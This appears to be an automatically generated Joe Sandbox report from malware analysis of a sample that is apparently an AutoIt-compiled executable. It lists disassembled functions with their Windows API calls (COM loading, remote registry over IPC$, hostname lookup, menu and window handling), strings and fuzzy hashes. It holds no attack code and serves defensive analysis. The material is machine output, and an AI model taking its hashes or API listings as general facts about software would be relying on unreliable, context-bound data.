Associated: 00000000.00000002.2087401416.0000000000757000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_690000_tfWjjV1LdT.jbxd

Similarity

API ID: Menu$DeleteItem$CountInfo$CursorForegroundMessagePopupPostTrackWindow_memset
String ID:
API String ID: 3993528054-0
Opcode ID: 936532aa7ba25d8fe8f871c224a2f4aa3545b2593de0296866ca5001f91bd827
Instruction ID: 4bbd2a1295ed3ef8cf06cd017b334d15a3b766f895faf704b213740ed97312ff
Opcode Fuzzy Hash: 936532aa7ba25d8fe8f871c224a2f4aa3545b2593de0296866ca5001f91bd827
Instruction Fuzzy Hash: 1771C17064120ABAEB218F58DC65FFABF66FF04324F204216F715AA2E1C7715860DF54

Function 007088AB Relevance: 19.6, APIs: 10, Strings: 1, Instructions: 324fileCOMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(?), ref: 007088D7
CoInitialize.OLE32(00000000), ref: 00708904
CoUninitialize.OLE32 ref: 0070890E
GetRunningObjectTable.OLE32(00000000,?), ref: 00708A0E
SetErrorMode.KERNEL32(00000001,00000029), ref: 00708B3B
CoGetInstanceFromFile.OLE32(00000000,?,00000000,00000015,00000002,?,00000001,00722C0C), ref: 00708B6F
CoGetObject.OLE32(?,00000000,00722C0C,?), ref: 00708B92
SetErrorMode.KERNEL32(00000000), ref: 00708BA5
SetErrorMode.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 00708C25
VariantClear.OLEAUT32(?), ref: 00708C35

Strings

,,r, xrefs: 007088C1

Memory Dump Source

Source File: 00000000.00000002.2087237739.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true

Associated: 00000000.00000002.2087216986.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087300785.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087300785.0000000000744000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087365346.000000000074E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087401416.0000000000757000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_690000_tfWjjV1LdT.jbxd

Similarity

API ID: ErrorMode$ObjectVariant$ClearFileFromInitInitializeInstanceRunningTableUninitialize
String ID: ,,r
API String ID: 2395222682-1227627816
Opcode ID: 513502b0e872a681ba1402a31d11eeadf5bebce536bbb4dca36416658fc999cb
Instruction ID: abbc1edb5fc3d0ead0f77906513f30a4965b95c48fffe8438c3fc2ecfc0c025f
Opcode Fuzzy Hash: 513502b0e872a681ba1402a31d11eeadf5bebce536bbb4dca36416658fc999cb
Instruction Fuzzy Hash: 1AC113B1208305EFD740DF28C88496AB7E9AF89358F004A5DF9899B291DB75ED05CB62

Function 006E77DC Relevance: 19.4, APIs: 8, Strings: 3, Instructions: 128registryshareCOMMON

Download Yara Rule

APIs

Part of subcall function 00697BCC: _memmove.LIBCMT ref: 00697C06

_memset.LIBCMT ref: 006E786B
WNetAddConnection2W.MPR(?,?,?,00000000), ref: 006E78A0
RegConnectRegistryW.ADVAPI32(?,80000002,?), ref: 006E78BC
RegOpenKeyExW.ADVAPI32(?,?,00000000,00020019,?,?,SOFTWARE\Classes\), ref: 006E78D8
RegQueryValueExW.ADVAPI32(?,00000000,00000000,00000000,?,?,?,SOFTWARE\Classes\), ref: 006E7902
CLSIDFromString.OLE32(?,?,?,SOFTWARE\Classes\), ref: 006E792A
RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 006E7935
RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 006E793A

Strings

\IPC$, xrefs: 006E7882
\CLSID, xrefs: 006E7822
SOFTWARE\Classes\, xrefs: 006E780C

Memory Dump Source

Source File: 00000000.00000002.2087237739.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true

Associated: 00000000.00000002.2087216986.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087300785.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087300785.0000000000744000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087365346.000000000074E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087401416.0000000000757000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_690000_tfWjjV1LdT.jbxd

Similarity

API ID: Close$ConnectConnection2FromOpenQueryRegistryStringValue_memmove_memset
String ID: SOFTWARE\Classes\$\CLSID$\IPC$
API String ID: 1411258926-22481851
Opcode ID: 4952a32bde3bcd0261ea60df205d349a653f35eafc69e2f3420180ac4aef0caf
Instruction ID: 1d2165b98803a04196f6e6e049da20a2671fff929440a5b82e09563560e99e78
Opcode Fuzzy Hash: 4952a32bde3bcd0261ea60df205d349a653f35eafc69e2f3420180ac4aef0caf
Instruction Fuzzy Hash: 5141F872C14629ABDF15EFA4DC85DEEB779FF14310F448069E905A32A1EB349E04CB94

Function 00710E1A Relevance: 19.4, APIs: 1, Strings: 10, Instructions: 120COMMON

Download Yara Rule

APIs

CharUpperBuffW.USER32(?,?,?,?,?,?,?,0070FDAD,?,?), ref: 00710E31

Strings

HKEY_CLASSES_ROOT, xrefs: 00710EC4
HKU, xrefs: 00710F43
HKEY_LOCAL_MACHINE, xrefs: 00710E9A
HKCU, xrefs: 00710F21
HKCR, xrefs: 00710ED9
HKEY_CURRENT_USER, xrefs: 00710F10
HKCC, xrefs: 00710EFF
HKLM, xrefs: 00710EAF
HKEY_CURRENT_CONFIG, xrefs: 00710EEE
HKEY_USERS, xrefs: 00710F32

Memory Dump Source

Source File: 00000000.00000002.2087237739.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true

Associated: 00000000.00000002.2087216986.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087300785.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087300785.0000000000744000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087365346.000000000074E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087401416.0000000000757000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_690000_tfWjjV1LdT.jbxd

Similarity

API ID: BuffCharUpper
String ID: HKCC$HKCR$HKCU$HKEY_CLASSES_ROOT$HKEY_CURRENT_CONFIG$HKEY_CURRENT_USER$HKEY_LOCAL_MACHINE$HKEY_USERS$HKLM$HKU
API String ID: 3964851224-909552448
Opcode ID: 26db56d21e6b36a615b918dcc5aef77f2b3eb7676e5d3a143d1335e5fd00bf4e
Instruction ID: 6d3901f276abb10d17eb9cfd93aeaa12bb5c024391e7501d7b862a712c08b5db
Opcode Fuzzy Hash: 26db56d21e6b36a615b918dcc5aef77f2b3eb7676e5d3a143d1335e5fd00bf4e
Instruction Fuzzy Hash: 5D416B7111028A8BDF50EF18D856AEF3769BF11310F244829FC551B2D2DBB89DDACBA0

Function 006EF7A1 Relevance: 19.3, APIs: 6, Strings: 5, Instructions: 75windowCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(00000000,?,?,00000FFF,00000000,?,006CE2A0,00000010,?,Bad directive syntax error,0071F910,00000000,?,?,?,>>>AUTOIT SCRIPT<<<), ref: 006EF7C2
LoadStringW.USER32(00000000,?,006CE2A0,00000010), ref: 006EF7C9

Part of subcall function 00697DE1: _memmove.LIBCMT ref: 00697E22

_wprintf.LIBCMT ref: 006EF7FC
__swprintf.LIBCMT ref: 006EF81E
MessageBoxW.USER32(00000000,00000001,00000001,00011010), ref: 006EF88D

Strings

Line %d:, xrefs: 006EF818
%s (%d) : ==> %s.: %s %s, xrefs: 006EF7F7
Error: , xrefs: 006EF85B
Line %d (File "%s"):, xrefs: 006EF833
., xrefs: 006EF873

Memory Dump Source

Source File: 00000000.00000002.2087237739.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true

Associated: 00000000.00000002.2087216986.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087300785.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087300785.0000000000744000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087365346.000000000074E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087401416.0000000000757000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_690000_tfWjjV1LdT.jbxd

Similarity

API ID: HandleLoadMessageModuleString__swprintf_memmove_wprintf
String ID: Error: $%s (%d) : ==> %s.: %s %s$.$Line %d (File "%s"):$Line %d:
API String ID: 1506413516-4153970271
Opcode ID: a57fa8fd90bd1294f931162057cce54efdbd5ef511b9102152927776610fed42
Instruction ID: cd29c5ea97cb59f891fcf2cd30c69d156c3c09089ee7ba7d0d53da4f2e6baa16
Opcode Fuzzy Hash: a57fa8fd90bd1294f931162057cce54efdbd5ef511b9102152927776610fed42
Instruction Fuzzy Hash: B621AC7290021EEFCF42EF90CC0AEEE773ABF18300F00446AF505660A2EA71A618DB55

Function 006F52C7 Relevance: 19.3, APIs: 5, Strings: 6, Instructions: 74COMMON

Download Yara Rule

APIs

Part of subcall function 00697BCC: _memmove.LIBCMT ref: 00697C06

Part of subcall function 00697924: _memmove.LIBCMT ref: 006979AD

mciSendStringW.WINMM(status PlayMe mode,?,00000100,00000000), ref: 006F5330
mciSendStringW.WINMM(close PlayMe,00000000,00000000,00000000), ref: 006F5346
mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 006F5357
mciSendStringW.WINMM(play PlayMe wait,00000000,00000000,00000000), ref: 006F5369
mciSendStringW.WINMM(play PlayMe,00000000,00000000,00000000), ref: 006F537A

Strings

open , xrefs: 006F52DF
status PlayMe mode, xrefs: 006F532B
close PlayMe, xrefs: 006F5341, 006F536E
alias PlayMe, xrefs: 006F5309
play PlayMe, xrefs: 006F5375
play PlayMe wait, xrefs: 006F5364

Memory Dump Source

Source File: 00000000.00000002.2087237739.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true

Associated: 00000000.00000002.2087216986.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087300785.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087300785.0000000000744000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087365346.000000000074E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087401416.0000000000757000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_690000_tfWjjV1LdT.jbxd

Similarity

API ID: SendString$_memmove
String ID: alias PlayMe$close PlayMe$open $play PlayMe$play PlayMe wait$status PlayMe mode
API String ID: 2279737902-1007645807
Opcode ID: 16d1c3c67371460fcacc3436dc2764fb4f8bfd2ba6319e8b10c72e54fc824caf
Instruction ID: 06c4e08b95c685e8d44b9cf8519adb70b21b51fcaea9c4dced27f2efb608d708
Opcode Fuzzy Hash: 16d1c3c67371460fcacc3436dc2764fb4f8bfd2ba6319e8b10c72e54fc824caf
Instruction Fuzzy Hash: 6411C471AA412DB9DBA0B7B5DC5ADFF7BBDEB91B50F000429B502A20D1EEA00D05C5A6

Function 006F46B7 Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 73networkCOMMON

Download Yara Rule

APIs

WSAStartup.WSOCK32(00000101,?), ref: 006F46D2
gethostname.WSOCK32(?,00000100), ref: 006F46EC
gethostbyname.WSOCK32(?), ref: 006F46F9
_wcscpy.LIBCMT ref: 006F4721
_memmove.LIBCMT ref: 006F4734
inet_ntoa.WSOCK32(?), ref: 006F473F
_strcat.LIBCMT ref: 006F474D
_wcscpy.LIBCMT ref: 006F4764
WSACleanup.WSOCK32 ref: 006F4772
_wcscpy.LIBCMT ref: 006F4780

Strings

0.0.0.0, xrefs: 006F471B

Memory Dump Source

Source File: 00000000.00000002.2087237739.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true

Associated: 00000000.00000002.2087216986.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087300785.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087300785.0000000000744000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087365346.000000000074E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087401416.0000000000757000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_690000_tfWjjV1LdT.jbxd

Similarity

API ID: _wcscpy$CleanupStartup_memmove_strcatgethostbynamegethostnameinet_ntoa
String ID: 0.0.0.0
API String ID: 208665112-3771769585
Opcode ID: 0bd0843b7bb6472041933bf0b1e0cb9a812aa29bd9bc169b67f15b205e428105
Instruction ID: d38f7ddc6029ed73a7c9c8113eae4d5c2dee5fba01b2893fb8f5de572466b27c
Opcode Fuzzy Hash: 0bd0843b7bb6472041933bf0b1e0cb9a812aa29bd9bc169b67f15b205e428105
Instruction Fuzzy Hash: FA110271504109AFDB60BB349C4AEEB77BDEF02321F0481BAF64592192EF759AC18B54

Function 006F4F75 Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 72sleepwindowtimeCOMMON

Download Yara Rule

APIs

timeGetTime.WINMM ref: 006F4F7A

Part of subcall function 006B049F: timeGetTime.WINMM(?,75A8B400,006A0E7B), ref: 006B04A3

Sleep.KERNEL32(0000000A), ref: 006F4FA6
EnumThreadWindows.USER32(?,Function_00064F28,00000000), ref: 006F4FCA
FindWindowExW.USER32(00000000,00000000,BUTTON,00000000), ref: 006F4FEC
SetActiveWindow.USER32 ref: 006F500B
SendMessageW.USER32(00000000,000000F5,00000000,00000000), ref: 006F5019
SendMessageW.USER32(00000010,00000000,00000000), ref: 006F5038
Sleep.KERNEL32(000000FA), ref: 006F5043
IsWindow.USER32 ref: 006F504F
EndDialog.USER32(00000000), ref: 006F5060

Strings

BUTTON, xrefs: 006F4FDE

Memory Dump Source

Source File: 00000000.00000002.2087237739.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true

Associated: 00000000.00000002.2087216986.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087300785.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087300785.0000000000744000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087365346.000000000074E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087401416.0000000000757000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_690000_tfWjjV1LdT.jbxd

Similarity

API ID: Window$MessageSendSleepTimetime$ActiveDialogEnumFindThreadWindows
String ID: BUTTON
API String ID: 1194449130-3405671355
Opcode ID: 1bfd43519430ec827b00ca6c95bdad13629b6a5095e44e80f1e17ac58bb9b729
Instruction ID: 5de80087dbbf708dc0ccd063cc5c38832d99634fc8db7eb1e20b0e9d3600254e
Opcode Fuzzy Hash: 1bfd43519430ec827b00ca6c95bdad13629b6a5095e44e80f1e17ac58bb9b729
Instruction Fuzzy Hash: E321C5B0241709AFE7115F24EC89AF63B6AEB45746F04D028F206822F1DFB94D608B69

Function 006FD58D Relevance: 18.3, APIs: 12, Instructions: 283comCOMMON

Download Yara Rule

APIs

Part of subcall function 00699837: __itow.LIBCMT ref: 00699862
Part of subcall function 00699837: __swprintf.LIBCMT ref: 006998AC

CoInitialize.OLE32(00000000), ref: 006FD5EA
SHGetSpecialFolderLocation.SHELL32(00000000,00000000,?), ref: 006FD67D
SHGetDesktopFolder.SHELL32(?), ref: 006FD691
CoCreateInstance.OLE32(00722D7C,00000000,00000001,00748C1C,?), ref: 006FD6DD
SHCreateShellItem.SHELL32(00000000,00000000,?,00000003), ref: 006FD74C
CoTaskMemFree.OLE32(?,?), ref: 006FD7A4
_memset.LIBCMT ref: 006FD7E1
SHBrowseForFolderW.SHELL32(?), ref: 006FD81D
SHGetPathFromIDListW.SHELL32(00000000,?), ref: 006FD840
CoTaskMemFree.OLE32(00000000), ref: 006FD847
CoTaskMemFree.OLE32(00000000,00000001,00000000), ref: 006FD87E
CoUninitialize.OLE32(00000001,00000000), ref: 006FD880

Memory Dump Source

Source File: 00000000.00000002.2087237739.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true

Associated: 00000000.00000002.2087216986.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087300785.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087300785.0000000000744000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087365346.000000000074E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087401416.0000000000757000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_690000_tfWjjV1LdT.jbxd

Similarity

API ID: FolderFreeTask$Create$BrowseDesktopFromInitializeInstanceItemListLocationPathShellSpecialUninitialize__itow__swprintf_memset
String ID:
API String ID: 1246142700-0
Opcode ID: bd806b524b6e320ecd8b817b17c96ce9670c2f0ec6e6471c87925fa7813f94a7
Instruction ID: 08cf8d2e6b19ad8d00366a892772640221627f03acae30a05be51cf7ff6fe14f
Opcode Fuzzy Hash: bd806b524b6e320ecd8b817b17c96ce9670c2f0ec6e6471c87925fa7813f94a7
Instruction Fuzzy Hash: 03B1EC75A00109AFDB44DFA8C885DAEBBBAFF49314F1484A9F909DB261DB30ED41CB54

Function 006EC267 Relevance: 18.2, APIs: 12, Instructions: 174COMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,00000001), ref: 006EC283
GetWindowRect.USER32(00000000,?), ref: 006EC295
MoveWindow.USER32(00000001,0000000A,?,00000001,?,00000000), ref: 006EC2F3
GetDlgItem.USER32(?,00000002), ref: 006EC2FE
GetWindowRect.USER32(00000000,?), ref: 006EC310
MoveWindow.USER32(00000001,?,00000000,00000001,?,00000000), ref: 006EC364
GetDlgItem.USER32(?,000003E9), ref: 006EC372
GetWindowRect.USER32(00000000,?), ref: 006EC383
MoveWindow.USER32(00000000,0000000A,00000000,?,?,00000000), ref: 006EC3C6
GetDlgItem.USER32(?,000003EA), ref: 006EC3D4
MoveWindow.USER32(00000000,0000000A,0000000A,?,-00000005,00000000), ref: 006EC3F1
InvalidateRect.USER32(?,00000000,00000001), ref: 006EC3FE

Memory Dump Source

Source File: 00000000.00000002.2087237739.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true

Associated: 00000000.00000002.2087216986.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087300785.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087300785.0000000000744000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087365346.000000000074E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087401416.0000000000757000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_690000_tfWjjV1LdT.jbxd

Similarity

API ID: Window$ItemMoveRect$Invalidate
String ID:
API String ID: 3096461208-0
Opcode ID: fc018c03024da631007c06adea59d6b031a73864599245e404b87bdd24644443
Instruction ID: dd217951fd9fda2ed7ecd869cbbed9f830772093d07099ad16166065e04884dd
Opcode Fuzzy Hash: fc018c03024da631007c06adea59d6b031a73864599245e404b87bdd24644443
Instruction Fuzzy Hash: 0E512B71B00205AFDB18CFADDD99AAEBBBAEB88710F14C129F615E62D0D7709D018B14

Function 0069201B Relevance: 18.2, APIs: 12, Instructions: 170timeCOMMON

Download Yara Rule

APIs

Part of subcall function 00691B41: InvalidateRect.USER32(?,00000000,00000001,?,?,?,00692036,?,00000000,?,?,?,?,006916CB,00000000,?), ref: 00691B9A

DestroyWindow.USER32(?,?,?,?,?,?,?,?,?,?,?,00000000,?,?), ref: 006920D3
KillTimer.USER32(-00000001,?,?,?,?,006916CB,00000000,?,?,00691AE2,?,?), ref: 0069216E
DestroyAcceleratorTable.USER32(00000000), ref: 006CBCA6
ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,006916CB,00000000,?,?,00691AE2,?,?), ref: 006CBCD7
ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,006916CB,00000000,?,?,00691AE2,?,?), ref: 006CBCEE
ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,006916CB,00000000,?,?,00691AE2,?,?), ref: 006CBD0A
DeleteObject.GDI32(00000000), ref: 006CBD1C

Memory Dump Source

Source File: 00000000.00000002.2087237739.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true

Associated: 00000000.00000002.2087216986.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087300785.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087300785.0000000000744000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087365346.000000000074E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087401416.0000000000757000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_690000_tfWjjV1LdT.jbxd

Similarity

API ID: Destroy$ImageList_$AcceleratorDeleteInvalidateKillObjectRectTableTimerWindow
String ID:
API String ID: 641708696-0
Opcode ID: fb98cadc1529432d090e9439ee8f57e1fd2ae742adde55f708a56518140607e3
Instruction ID: f2be9817a5b49986d2e6bbc09c76d239601eb060031ccbbe7aceb4b961a7c309
Opcode Fuzzy Hash: fb98cadc1529432d090e9439ee8f57e1fd2ae742adde55f708a56518140607e3
Instruction Fuzzy Hash: 95618C30500B02EFCB259F18D969BA977F7FF44312F50842CE5428AAA0C7B8B891DB94

Function 006921A5 Relevance: 18.1, APIs: 12, Instructions: 132COMMON

Download Yara Rule

APIs

Part of subcall function 006925DB: GetWindowLongW.USER32(?,000000EB), ref: 006925EC

GetSysColor.USER32(0000000F), ref: 006921D3

Memory Dump Source

Source File: 00000000.00000002.2087237739.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true

Associated: 00000000.00000002.2087216986.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087300785.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087300785.0000000000744000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087365346.000000000074E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087401416.0000000000757000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_690000_tfWjjV1LdT.jbxd

Similarity

API ID: ColorLongWindow
String ID:
API String ID: 259745315-0
Opcode ID: 85277a3c6aa5baaf37230dee4cb5db30639d9337b3307643849a50246ef1b6c1
Instruction ID: 142133476a9a4ffc5b1d4bbb5fc6393a9f1b66d1448f1e96d4da80591c6e75a6
Opcode Fuzzy Hash: 85277a3c6aa5baaf37230dee4cb5db30639d9337b3307643849a50246ef1b6c1
Instruction Fuzzy Hash: F341D030004541FADF255F28ECA8BF93B6BEB06331F248265FE658A2E1C7318D42DB21

Function 006FA8A7 Relevance: 17.7, APIs: 3, Strings: 7, Instructions: 183COMMON

Download Yara Rule

APIs

CharLowerBuffW.USER32(?,?,0071F910), ref: 006FA90B
GetDriveTypeW.KERNEL32(00000061,007489A0,00000061), ref: 006FA9D5
_wcscpy.LIBCMT ref: 006FA9FF

Strings

unknown, xrefs: 006FA996
network, xrefs: 006FA969
fixed, xrefs: 006FA953
removable, xrefs: 006FA93D
all, xrefs: 006FA911
cdrom, xrefs: 006FA927
ramdisk, xrefs: 006FA97F

Memory Dump Source

Source File: 00000000.00000002.2087237739.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true

Associated: 00000000.00000002.2087216986.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087300785.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087300785.0000000000744000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087365346.000000000074E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087401416.0000000000757000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_690000_tfWjjV1LdT.jbxd

Similarity

API ID: BuffCharDriveLowerType_wcscpy
String ID: all$cdrom$fixed$network$ramdisk$removable$unknown
API String ID: 2820617543-1000479233
Opcode ID: a67cac32ba855513a49861811af6cfac43051e6b31bb5a2feba0cfdb23323e54
Instruction ID: bb402f14430789ddad754e6db06a5fcb265fa9e08acc8ed096e5200b0bb6d336
Opcode Fuzzy Hash: a67cac32ba855513a49861811af6cfac43051e6b31bb5a2feba0cfdb23323e54
Instruction Fuzzy Hash: C6519EB1128305AFC740EF54C992ABFB7AAFF85340F10482DF599572A2DB719909CB53

Function 00699837 Relevance: 17.6, APIs: 6, Strings: 4, Instructions: 146COMMON

Download Yara Rule

APIs

__itow.LIBCMT ref: 00699862
__swprintf.LIBCMT ref: 006998AC
__i64tow.LIBCMT ref: 006CF5E6

Strings

False, xrefs: 006CF5AE
%.15g, xrefs: 006998A6
0x%p, xrefs: 006CF5C8
True, xrefs: 006CF5A7

Memory Dump Source

Source File: 00000000.00000002.2087237739.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true

Associated: 00000000.00000002.2087216986.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087300785.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087300785.0000000000744000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087365346.000000000074E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087401416.0000000000757000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_690000_tfWjjV1LdT.jbxd

Similarity

API ID: __i64tow__itow__swprintf
String ID: %.15g$0x%p$False$True
API String ID: 421087845-2263619337
Opcode ID: 6ab0f3bcd63557ad8530c810a08a59f8f9efdd5cf4657ad0ebc180c7a65170f6
Instruction ID: bff3435b1d5670fd9f22b7a941af073e270976984c490e5e0e8fc37b35de59b6
Opcode Fuzzy Hash: 6ab0f3bcd63557ad8530c810a08a59f8f9efdd5cf4657ad0ebc180c7a65170f6
Instruction Fuzzy Hash: 6241B8B1610205AEEF64DF38D941EBA77EFEF05300F64486EE549D7392EA319942CB21

Function 00717152 Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 103windowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 0071716A
CreateMenu.USER32 ref: 00717185
SetMenu.USER32(?,00000000), ref: 00717194
GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00717221
IsMenu.USER32(?), ref: 00717237
CreatePopupMenu.USER32 ref: 00717241
InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 0071726E
DrawMenuBar.USER32 ref: 00717276

Strings

F, xrefs: 00717262
0, xrefs: 00717160

Memory Dump Source

Source File: 00000000.00000002.2087237739.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true

Associated: 00000000.00000002.2087216986.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087300785.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087300785.0000000000744000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087365346.000000000074E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087401416.0000000000757000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_690000_tfWjjV1LdT.jbxd

Similarity

API ID: Menu$CreateItem$DrawInfoInsertPopup_memset
String ID: 0$F
API String ID: 176399719-3044882817
Opcode ID: 32ad6066feb77fd308cdd351c22c074117d900b6d96bf3714f3fc749b7cefb4d
Instruction ID: e641dd38633b1ecfd0c715552510ba820ca9b892686e13feed1fa56691e25446
Opcode Fuzzy Hash: 32ad6066feb77fd308cdd351c22c074117d900b6d96bf3714f3fc749b7cefb4d
Instruction Fuzzy Hash: 82414974A01209EFDB24DF68D845EDA7BF6FF48310F148029F905973A1D779A960CB94

Function 007174BB Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 101windowCOMMON

Download Yara Rule

APIs

